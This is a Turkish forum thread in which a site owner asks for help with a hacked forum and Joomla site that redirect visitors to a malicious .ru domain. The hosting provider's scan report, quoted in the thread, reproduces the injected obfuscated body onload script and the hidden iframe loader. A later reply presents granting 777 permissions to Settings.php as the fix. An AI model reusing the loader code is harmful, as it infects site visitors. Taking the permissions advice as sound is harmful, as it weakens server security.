Trojan

[samet_1905]

Ne denedimse olmadı arkadaşlar uzun zamandır ugrasıyorum ama çözemedım ..Şimdi buraya yazıcam tüm denedıklerımı ...
Ekstra fikri olan varsa paylaşırsa sevınırım .Yıne olmazsa sanırım forum uçucak hersey başa dönucek ....


İlk başlarda googlede sıtem zararlı olarak gözukmeye basladı erısım kesıldı 3-5 ay evvel ...

Hostıng fırmam İHS telekoma   bıldırdım bana  şu şekilde bır mesaj attılar  ...

Merhaba,

/var/www/vhosts/tokatsporluyuz.net/httpsdocs/index.html: Exploit.HTML.IFrame-6 FOUND

Web sitenizin kaynak kodunda <body> bölümünde aşağıdaki kod inject edilmiş görünmektedir. Sanırım probleminizin sebebi bu koddan kaynaklanıyor. Aşağıdaki kodu <body> olarak değiştirdiğinizde problemin çözülmesi muhtemeldir.

<body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);"><iframe src="http://litetopfindworld.cn/in.cgi?cocacola32" width=1 height=1 style="visibility: hidden"></iframe>


İyi Çalışmalar


Belirttikleri kodu o dizinen kaldırdım , ftp şifremı degstırdım  googlede indexi tazeleyınce sorun kalkar dıye dusunuyordum ... Ama google kaldırmadı   ..Bende tekrar bütün indexleri ve bazı dosyaları kontrol ettım  ama  iframe vs  herhangı bır sey bulamadım  ...

En son ftp i komple bılgısayarıma ındırdım ...

Advanced Find and Replace 4   programı ile   şu kelimeleri

IFrame
script
gpt0.ru
body  vsvs  bunları tektek gezdım 

6 değişik antivürüs programı ıle tarattım ftp i    sonuş dosyalar temiz oldu  ...


sonra ftp den  tektek  butun dızınlerı tekrar gezdım  şöyle bir manzarayla karsılastım ...

index.php dosyamın yanında  index.PHP~ Dosyası seklınde bır dosya daha  ..

sources klasöru ıcınde ise ;

Display.php , ManageMembergroups.php  , ManageAttachments.php , ManageNews , PersonalMessage.php , Post.php , Profile.php , QueryString.php  , Search.php , Subs.php , Subs-Boards ve Subs-Post       bunların hepsının ısımlerının yanına  PHP~  eklenerek ıkıncı bır dosya olusmus  . Ne kadar bulduysam bu şekilde dosya sıldım ama   duzelme olmadı   .... 


Forum içinde aktıf olarak sıkıntı olusturmuyor bunlar  . Fakat forum menusunde üyelere tıkladıkdan sonra  üyelerde ara dedıgım an  alttakı resımde  alt kısma dıkkat edin  gpt0.ru ısımlı dosyaya yonlendırılıyor dıyor  .




gpt0.ru  uzantısı  hatta ru uzantısını dahı tektek kontrol ettım forum içinde    ama bulamadım    ...

yukardakı resmın devamındada sayfam böyle oluyor  ..




ve en sonda şu şekili alıyor  ...





Joomlada vardı sistemde silmiştim komple  ... Şimdi tekrar yukledım   .Joomladada  içerik girmeme izin vermıyor   aynı  şekilde  sayfayı temasız gösterıyor  sonra vırus sayfasına yonlendırıyor  ....


Yardımcı olma şansı olan varmı epeydır ugrasıyorum bakmadıgım döküman kalmadı ama ru uzantılı dosyalar yayılmaya baslıyor  ve  o kadar aramama tektek bakmama ragmen bulamıorum  :S



php~ dosyaları ıle ılgılı bır ıkı örnek koyuyorum eke ılgılınene arkadaslar kontrol ederse sevınırım ....

[DNA27]

püff oku oku bitmiyor..

ilk olarak ne kadar sürdü bu işlemi yapıp googleyı ne kadar bekledın anında kalkmaz.

~ bu uzantı dosya yedegini gösterir. o dosyalarda değişiklik yapmışsın o da yedek almış o sorun değil..

[samet_1905]

püff oku oku bitmiyor..

ilk olarak ne kadar sürdü bu işlemi yapıp googleyı ne kadar bekledın anında kalkmaz.

~ bu uzantı dosya yedegini gösterir. o dosyalarda değişiklik yapmışsın o da yedek almış o sorun değil..

O kadar uğraştımki yazıyımda bıryere rahatlıyım dedım : )


Google ile ilgili kısmı  3-5 ay evvel  çözmüştük hostıng fırmamda böyle söllemıstı   indexlendıgı zaman duzelır demıstı bu kadr uzun suredır sıteme ugramama ıhtımalı olmaz cunku google anasayfamdakı sıte baslıgı degısıklıklerını gosterıyor ...



Ayrıca sadece google ıle baglantılı deıl durum forum ıcındede sorun var   resımlerle gösterdıgım şekilde onu çözsem muhtemelen bütün sorunlar ortadan kalkıcak 

[DNA27]

panelden oraya mı yönlendirilmiş acaba 2 . bir fikir virüs yapmıs olabılırmı ama baya  kontrol etmıssın temız..

bir kontrol edelim. şimdi index.html die bir dosya at ftp ye içine bir şeyler yaz krala .

virüsmü yönlendiriyor panelden mi bakalım bir

[samet_1905]

Buraya normal giriyor sımdı attım  indexi  deneme dıye klasör acıp

http://www.tokatsporluyuz.net/deneme/index.html

[DNA27]

demekki dosyalarında bir problem var gibi tekrar bir kontrol et yda uzman ları bekleyelım..

[samet_1905]

DNA27   Teşekkür ettim sağol  ...


Hani temadan desem  defaulttada aynı seyı yapıor   ....Joomladada panele gırıyorum ama ıcerık ekleyemıorum menuyu degıstıremıorum  :S
Ne bela bıseydır  ne kadar trojan  örnegı varsa ısımlerını tektek aradım ama yok :S

[DNA27]

sen beni bir ekle msn den bakak beraber pc ine girerek

[samet_1905]

Hocam elıne saglık ugrastırdık senıde   o kadar kontrol ettın gordun sende bela bısey   ....


Yedekleyıp komple yenıden hayata gecıorum mecburen   

[DNA27]

Settings.php ye 777 izin verdik düzeldi forum..

Memberlist.php ve Memberlist.template.php sıfırldık kontrol ettik
yine aynı hata ..



üyeler de ara ' da hata var sadece...

[samet_1905]

Mecburen sılıyoruz